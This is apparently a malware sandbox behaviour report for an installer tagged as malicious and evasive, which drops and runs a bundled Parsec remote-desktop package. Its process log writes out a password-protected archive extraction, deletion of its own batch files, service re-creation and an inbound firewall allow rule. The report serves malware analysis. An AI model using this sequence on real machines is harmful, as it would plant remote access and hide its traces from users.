Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618161A8071_2_00007FF618161A80
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817DAC471_2_00007FF61817DAC4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817FB9071_2_00007FF61817FB90
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618142BF071_2_00007FF618142BF0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818DC4071_2_00007FF61818DC40
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819BC3C71_2_00007FF61819BC3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618185CDC71_2_00007FF618185CDC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817DCD071_2_00007FF61817DCD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818FD5C71_2_00007FF61818FD5C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818CD7071_2_00007FF61818CD70
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618188D9471_2_00007FF618188D94
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618144DD071_2_00007FF618144DD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817EDF871_2_00007FF61817EDF8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817DED471_2_00007FF61817DED4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618192F6071_2_00007FF618192F60
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618160FE071_2_00007FF618160FE0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61814706071_2_00007FF618147060
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819D07471_2_00007FF61819D074
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817E0E071_2_00007FF61817E0E0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819F0D471_2_00007FF61819F0D4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818812071_2_00007FF618188120
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61816E19071_2_00007FF61816E190
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181861E871_2_00007FF6181861E8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61814322071_2_00007FF618143220
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61816D26071_2_00007FF61816D260
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817E2E471_2_00007FF61817E2E4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819137071_2_00007FF618191370
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181443A071_2_00007FF6181443A0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181903DC71_2_00007FF6181903DC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819751C71_2_00007FF61819751C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818958971_2_00007FF618189589
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181985E471_2_00007FF6181985E4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819A72C71_2_00007FF61819A72C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817F78C71_2_00007FF61817F78C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61816179071_2_00007FF618161790
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817D8C071_2_00007FF61817D8C0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818F8C871_2_00007FF61818F8C8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181648D071_2_00007FF6181648D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Process token adjusted: Load Driver
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Process token adjusted: Security
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: String function: 00007FF618148380 appears 52 times
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: String function: 00007FF6181497D0 appears 99 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: String function: 00007FF72C2F8380 appears 52 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: String function: 00007FF72C30EAE0 appears 53 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: String function: 00007FF72C2F97D0 appears 142 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: String function: 00007FF7E5A897D0 appears 99 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: String function: 00007FF7E5A88380 appears 52 times
Source: uu8v4UUzTU.exe | Static PE information: invalid certificate
Source: uu8v4UUzTU.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-JR54E.tmp.2.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: is-JBM9N.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-CR69T.tmp.2.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: is-UEG3C.tmp.2.dr | Static PE information: No import functions for PE file found
Source: is-ETRQM.tmp.2.dr | Static PE information: No import functions for PE file found
Source: is-DPGTR.tmp.2.dr | Static PE information: No import functions for PE file found
Source: is-O65TT.tmp.2.dr | Static PE information: No import functions for PE file found
Source: is-VK3B0.tmp.2.dr | Static PE information: No import functions for PE file found
Source: is-E0QD0.tmp.2.dr | Static PE information: No import functions for PE file found
Source: is-S2KJ6.tmp.2.dr | Static PE information: No import functions for PE file found
Source: is-V0EDB.tmp.2.dr | Static PE information: No import functions for PE file found
Source: is-E9NUA.tmp.2.dr | Static PE information: No import functions for PE file found
Source: is-2OR81.tmp.2.dr | Static PE information: No import functions for PE file found
Source: uu8v4UUzTU.exe, 00000000.00000003.2029697537.000000007FE15000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000003.2029324917.00000000025F9000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000000.2028002114.00000000004C6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000003.2295037831.0000000002238000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe | Binary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine | Classification label: mal42.evad.winEXE@127/204@2/2
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C314560 GetLastError,FormatMessageA,LocalFree | 48_2_00007FF72C314560
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F86830 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle | 6_2_00F86830
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F7BD0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle | 6_2_00F7BD0C
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 13_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 13_2_0040352D
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function: 45_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 45_2_0040352D
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3148D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn | 48_2_00007FF72C3148D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5AA48D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn | 51_2_00007FF7E5AA48D0
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function: 65_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 65_2_0040352D
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 71_2_00007FF6181648D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn | 71_2_00007FF6181648D0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F7BC48 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW | 6_2_00F7BC48
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 48_2_00007FF72C314400
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 51_2_00007FF7E5AA4400
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 71_2_00007FF618164400
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD031850 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,ProcessIdToSessionId,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,CloseHandle,CloseHandle,SetTokenInformation,CreateProcessAsUserW,CloseHandle,CloseHandle | 39_2_00007FF7CD031850
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 13_2_004021AA CoCreateInstance | 13_2_004021AA
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD032AC0 StartServiceCtrlDispatcherW | 39_2_00007FF7CD032AC0
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | File created: C:\Program Files\Parsec
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Local\Programs
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4288:120:WilError_03
Source: C:\Windows\System32\drvinst.exe | Mutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2804:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe | File created: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "parsecd.exe")
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: nefconc.exe | String found in binary or memory: --inf-default-install Installs an INF file with a [DefaultInstall] section
Source: nefconc.exe | String found in binary or memory: --add-class-filter Adds a service to a device class' filter collection
Source: nefconc.exe | String found in binary or memory: --install-driver
Source: nefconc.exe | String found in binary or memory: --install-driver Invoke the installation of a given PNP driver
Source: nefconc.exe | String found in binary or memory: --inf-default-install
Source: nefconc.exe | String found in binary or memory: Invoked --inf-default-install
Source: nefconc.exe | String found in binary or memory: --add-class-filter
Source: nefconw.exe | String found in binary or memory: --install-driver Invoke the installation of a given PNP driver
Source: nefconw.exe | String found in binary or memory: Invoked --inf-default-install
Source: nefconw.exe | String found in binary or memory: --inf-default-install
Source: nefconw.exe | String found in binary or memory: --add-class-filter Adds a service to a device class' filter collection
Source: nefconw.exe | String found in binary or memory: --install-driver
Source: nefconw.exe | String found in binary or memory: --inf-default-install Installs an INF file with a [DefaultInstall] section
Source: nefconw.exe | String found in binary or memory: --add-class-filter
Source: uu8v4UUzTU.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe File read: C:\Users\user\Desktop\uu8v4UUzTU.exe
Source: unknown Process created: C:\Users\user\Desktop\uu8v4UUzTU.exe "C:\Users\user\Desktop\uu8v4UUzTU.exe"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Process created: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp "C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp" /SL5="$1043C,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "SoundNight.7z"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop Parsec
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete Parsec
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files\Parsec\pservice.exe "C:\Program Files\Parsec\pservice.exe"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
